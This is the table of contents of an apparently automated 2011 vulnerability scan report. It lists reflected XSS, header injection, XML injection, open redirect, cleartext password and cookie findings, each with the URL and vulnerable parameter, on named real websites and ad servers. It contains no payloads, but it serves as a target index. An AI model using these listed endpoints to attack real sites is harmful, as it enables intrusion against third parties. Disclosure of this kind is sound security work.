XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05152011-05

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sun May 15 15:16:33 CDT 2011.




1. SQL injection

2. LDAP injection

3. HTTP header injection

3.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

4. Cross-site scripting (reflected)

4.1. http://choices.truste.com/ca [c parameter]

4.2. http://choices.truste.com/ca [cid parameter]

4.3. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

4.4. http://choices.truste.com/ca [plc parameter]

4.5. http://choices.truste.com/ca [zi parameter]

4.6. https://console.iservices.net.nz/ [name of an arbitrarily supplied request parameter]

4.7. https://idm.net.nz/secure/ [name of an arbitrarily supplied request parameter]

4.8. https://idm.net.nz/secure/index.php [name of an arbitrarily supplied request parameter]

4.9. https://secure.tagged.com/secure_login.html [loc parameter]

4.10. https://secure.tagged.com/secure_login.html [name of an arbitrarily supplied request parameter]

4.11. https://secure.tagged.com/secure_login.html [uri parameter]

4.12. https://secure.tagged.com/secure_login.html [ver parameter]

4.13. http://tweetbeat.com/favicon.ico [REST URL parameter 1]

4.14. http://www.kosmix.com/ [name of an arbitrarily supplied request parameter]

4.15. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

4.16. http://www.kosmix.com/images/ck.txt [REST URL parameter 2]

4.17. http://www.kosmix.com/images/favicon.ico [REST URL parameter 2]

4.18. http://www.kosmix.com/images/pv.txt [REST URL parameter 1]

4.19. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.20. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.21. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

4.22. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.23. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.24. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

4.25. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.26. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.27. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 1]

4.28. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 2]

4.29. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 2]

4.30. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 1]

4.31. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

4.32. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

4.33. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 1]

4.34. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

4.35. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

4.36. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

4.37. http://www.orcon.net.nz/address_locator/=&type=orconatwork [name of an arbitrarily supplied request parameter]

4.38. http://www.righthealth.com/ [name of an arbitrarily supplied request parameter]

4.39. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

4.40. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

4.41. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

4.42. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

4.43. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

4.44. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

4.45. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

4.46. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 3]

4.47. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.48. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.49. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

4.50. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.51. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.52. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.53. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.54. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 2]

4.55. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 2]

4.56. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-chimborazo-153574.css [REST URL parameter 2]

4.57. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-chimborazo-153574.css [REST URL parameter 2]

4.58. http://www.tagged.com/api/ [data parameter]

4.59. http://www.tagged.com/api/ [data parameter]

4.60. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

4.61. http://www.kosmix.com/ [User-Agent HTTP header]

4.62. http://www.righthealth.com/ [User-Agent HTTP header]

5. Flash cross-domain policy

5.1. http://a.dlqm.net/crossdomain.xml

5.2. http://ad.doubleclick.net/crossdomain.xml

5.3. http://ads.pointroll.com/crossdomain.xml

5.4. http://ajax.googleapis.com/crossdomain.xml

5.5. http://amch.questionmarket.com/crossdomain.xml

5.6. http://api.facebook.com/crossdomain.xml

5.7. http://b.scorecardresearch.com/crossdomain.xml

5.8. http://bh.contextweb.com/crossdomain.xml

5.9. http://bs.serving-sys.com/crossdomain.xml

5.10. http://c.betrad.com/crossdomain.xml

5.11. http://c5.zedo.com/crossdomain.xml

5.12. http://c7.zedo.com/crossdomain.xml

5.13. https://console.iservices.net.nz/crossdomain.xml

5.14. http://ds.serving-sys.com/crossdomain.xml

5.15. http://ib.adnxs.com/crossdomain.xml

5.16. http://l.betrad.com/crossdomain.xml

5.17. http://log30.doubleverify.com/crossdomain.xml

5.18. http://m.adnxs.com/crossdomain.xml

5.19. http://pixel.quantserve.com/crossdomain.xml

5.20. http://r1-ads.ace.advertising.com/crossdomain.xml

5.21. http://r1.zedo.com/crossdomain.xml

5.22. http://s3.amazonaws.com/crossdomain.xml

5.23. http://segment-pixel.invitemedia.com/crossdomain.xml

5.24. http://speed.pointroll.com/crossdomain.xml

5.25. http://t.mookie1.com/crossdomain.xml

5.26. http://tcr.tynt.com/crossdomain.xml

5.27. http://vtr.com/crossdomain.xml

5.28. http://webmail.vtr.net/crossdomain.xml

5.29. http://www.kol.co.nz/crossdomain.xml

5.30. http://www.kosmix.com/crossdomain.xml

5.31. http://www.righthealth.com/crossdomain.xml

5.32. http://api.tweetmeme.com/crossdomain.xml

5.33. http://cookex.amp.yahoo.com/crossdomain.xml

5.34. http://feeds.bbci.co.uk/crossdomain.xml

5.35. http://googleads.g.doubleclick.net/crossdomain.xml

5.36. http://newsrss.bbc.co.uk/crossdomain.xml

5.37. http://player.ooyala.com/crossdomain.xml

5.38. http://pubads.g.doubleclick.net/crossdomain.xml

5.39. https://secure-static.tagged.com/crossdomain.xml

5.40. http://secure.tagged.com/crossdomain.xml

5.41. https://secure.tagged.com/crossdomain.xml

5.42. http://www.facebook.com/crossdomain.xml

5.43. http://www.tagged.com/crossdomain.xml

5.44. http://www.orcon.net.nz/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://ads.pointroll.com/clientaccesspolicy.xml

6.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.4. http://player.ooyala.com/clientaccesspolicy.xml

6.5. http://speed.pointroll.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://webmail.vtr.net/

7.2. http://webmail.vtr.net/

7.3. http://www.kol.co.nz/account.php

7.4. http://www.kol.co.nz/payment/credit.php

7.5. http://www.kol.co.nz/webmail.php

8. XML injection

8.1. http://api.facebook.com/restserver.php [format parameter]

8.2. http://platform.twitter.com/anywhere.js [REST URL parameter 1]

8.3. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.4. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.5. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 1]

8.6. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 2]

8.7. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 3]

8.8. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 4]

8.9. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 1]

8.10. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 2]

8.11. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 3]

8.12. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 4]

8.13. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 1]

8.14. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 2]

8.15. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 3]

8.16. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 4]

8.17. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 1]

8.18. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 2]

8.19. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 3]

8.20. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 4]

8.21. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 1]

8.22. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 2]

8.23. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 3]

8.24. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 4]

8.25. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 1]

8.26. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 2]

8.27. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 3]

8.28. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 4]

8.29. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 1]

8.30. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 2]

8.31. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 3]

8.32. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 4]

8.33. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 1]

8.34. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 2]

8.35. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 3]

8.36. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 4]

8.37. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 1]

8.38. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 2]

8.39. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 3]

8.40. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 4]

8.41. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 1]

8.42. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 2]

8.43. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 3]

8.44. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 4]

8.45. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 1]

8.46. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 2]

8.47. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 3]

8.48. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 4]

8.49. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 1]

8.50. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 2]

8.51. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 3]

8.52. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 4]

8.53. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 1]

8.54. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 2]

8.55. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 3]

8.56. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 4]

8.57. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 1]

8.58. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 2]

8.59. http://trk.cetrk.com/s [REST URL parameter 1]

8.60. http://trk.cetrk.com/t.js [REST URL parameter 1]

8.61. http://www.kol.co.nz/css/ie_hacks.css [REST URL parameter 1]

8.62. http://www.kol.co.nz/css/ie_hacks.css [REST URL parameter 2]

8.63. http://www.kol.co.nz/css/print.css [REST URL parameter 1]

8.64. http://www.kol.co.nz/css/print.css [REST URL parameter 2]

8.65. http://www.kol.co.nz/css/stylev1.53.css [REST URL parameter 1]

8.66. http://www.kol.co.nz/css/stylev1.53.css [REST URL parameter 2]

8.67. http://www.kol.co.nz/js/domfunction.js [REST URL parameter 1]

8.68. http://www.kol.co.nz/js/domfunction.js [REST URL parameter 2]

8.69. http://www.kol.co.nz/js/utils.js [REST URL parameter 1]

8.70. http://www.kol.co.nz/js/utils.js [REST URL parameter 2]

8.71. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

8.72. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

8.73. http://www.kosmix.com/images/ck.txt [REST URL parameter 1]

8.74. http://www.kosmix.com/images/ck.txt [REST URL parameter 2]

8.75. http://www.kosmix.com/images/favicon.ico [REST URL parameter 1]

8.76. http://www.kosmix.com/images/favicon.ico [REST URL parameter 2]

8.77. http://www.kosmix.com/images/mpv.txt [REST URL parameter 1]

8.78. http://www.kosmix.com/images/mpv.txt [REST URL parameter 2]

8.79. http://www.kosmix.com/images/pv.txt [REST URL parameter 1]

8.80. http://www.kosmix.com/images/pv.txt [REST URL parameter 2]

8.81. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

8.82. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

8.83. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

8.84. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 1]

8.85. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 1]

8.86. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

8.87. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

8.88. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 1]

8.89. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

8.90. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 3]

8.91. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

8.92. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

8.93. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

8.94. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 1]

9. SSL cookie without secure flag set

9.1. https://console.iserve.net.nz/webmail/src/login.php

9.2. https://console.iservices.net.nz/

9.3. https://mail.orcon.net.nz/portal/login.php

9.4. https://secure.tagged.com/secure_login.html

10. Session token in URL

10.1. http://bh.contextweb.com/bh/set.aspx

10.2. https://secure.tagged.com/secure_login.html

10.3. http://www.tagged.com/api/

11. SSL certificate

11.1. https://clicktale.pantherssl.com/

11.2. https://d2s.iserve.net.nz:8443/

11.3. https://console.iserve.net.nz/

11.4. https://console.iservices.net.nz/

11.5. https://idm.net.nz/

11.6. https://mail.orcon.net.nz/

11.7. https://orcres.cosmos.net.nz/

11.8. https://portal.bizoservices.com/

11.9. https://secure-static.tagged.com/

11.10. https://secure.tagged.com/

12. Open redirection

12.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ru parameter]

12.2. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]

12.3. https://orcres.cosmos.net.nz/orconmembersarea.php [failureurl parameter]

13. Cookie scoped to parent domain

13.1. http://t.mookie1.com/t/v1/imp

13.2. http://www.opensource.org/licenses/gpl-license.php

13.3. http://www.opensource.org/licenses/mit-license.php

13.4. http://ads.pointroll.com/PortalServe/

13.5. http://amch.questionmarket.com/adscgen/sta.php

13.6. http://b.scorecardresearch.com/b

13.7. http://b.scorecardresearch.com/p

13.8. http://bh.contextweb.com/bh/set.aspx

13.9. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

13.10. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

13.11. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

13.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.14. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js

13.15. http://cms.ad.yieldmanager.net/v1/cms

13.16. http://code.google.com/p/swfobject/

13.17. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms

13.18. http://ib.adnxs.com/getuid

13.19. http://ib.adnxs.com/seg

13.20. http://ic.tynt.com/b/p

13.21. http://m.adnxs.com/msftcookiehandler

13.22. http://pixel.quantserve.com/pixel

13.23. http://pixel.rubiconproject.com/tap.php

13.24. http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.25. http://r1-ads.ace.advertising.com/ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.26. http://r1-ads.ace.advertising.com/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.27. http://r1-ads.ace.advertising.com/site=705487/size=300250/u=2/bnum=43626829/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.28. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=24438061/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.29. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=28476770/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.30. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=92522527/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

13.31. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=11211453/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html

13.32. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=12741032/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

13.33. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=24692193/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

13.34. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=28905079/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.35. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=36738221/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.36. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=37579081/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

13.37. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=42928792/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html%253Ftopic%253Dreport-abuse

13.38. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=44415793/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

13.39. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=49573366/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fsafety.html

13.40. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=58838557/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.41. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=68130074/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fbrowse.html

13.42. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=69569526/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html

13.43. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.44. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=81707588/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Ffind_groups.html

13.45. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=94465860/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

13.46. http://secure.tagged.com/

13.47. https://secure.tagged.com/secure_login.html

13.48. http://segment-pixel.invitemedia.com/pixel

14. Cookie without HttpOnly flag set

14.1. https://console.iserve.net.nz/webmail/src/login.php

14.2. https://console.iservices.net.nz/

14.3. https://portal.bizoservices.com/

14.4. http://signup.kol.co.nz/customers/Calling_bundle_promotion.asp

14.5. http://t.mookie1.com/t/v1/imp

14.6. http://tag.admeld.com/match

14.7. http://vtr.com/productos/principal/packs/index.php

14.8. http://www.benjaminsterling.com/experiments/jqShuffle/

14.9. http://www.mathias-bank.de/

14.10. http://www.opensource.org/licenses/gpl-license.php

14.11. http://www.opensource.org/licenses/mit-license.php

14.12. http://www.orcon.net.nz/athome.php

14.13. http://www.orcon.net.nz/atwork.php

14.14. http://www.orcon.net.nz/home/rural/

14.15. http://www.orcon.net.nz/mobile/broadband-plans

14.16. http://www.orcon.net.nz/mobile/broadband-plans/upgrade

14.17. http://www.orcon.net.nz/mobile/handsets

14.18. http://www.orcon.net.nz/mobile/plans

14.19. http://www.orcon.net.nz/mobile/plans/upgrade

14.20. http://www.orcon.net.nz/work/business_hosting

14.21. http://www.orcon.net.nz/work/business_internet

14.22. http://ad.yieldmanager.com/pixel

14.23. http://ads.pointroll.com/PortalServe/

14.24. http://amch.questionmarket.com/adscgen/sta.php

14.25. http://b.scorecardresearch.com/b

14.26. http://b.scorecardresearch.com/p

14.27. http://bh.contextweb.com/bh/set.aspx

14.28. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

14.29. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

14.30. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

14.31. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

14.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.33. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.34. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js

14.35. http://cms.ad.yieldmanager.net/v1/cms

14.36. http://code.google.com/p/swfobject/

14.37. http://console.iserve.net.nz/

14.38. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms

14.39. http://help.tagged.com/index.php/report-abuse.html

14.40. http://hits.e.cl/cert/hit.dll

14.41. http://ic.tynt.com/b/p

14.42. http://kosmix.com/

14.43. https://mail.orcon.net.nz/portal/login.php

14.44. http://pixel.quantserve.com/pixel

14.45. http://pixel.rubiconproject.com/tap.php

14.46. http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

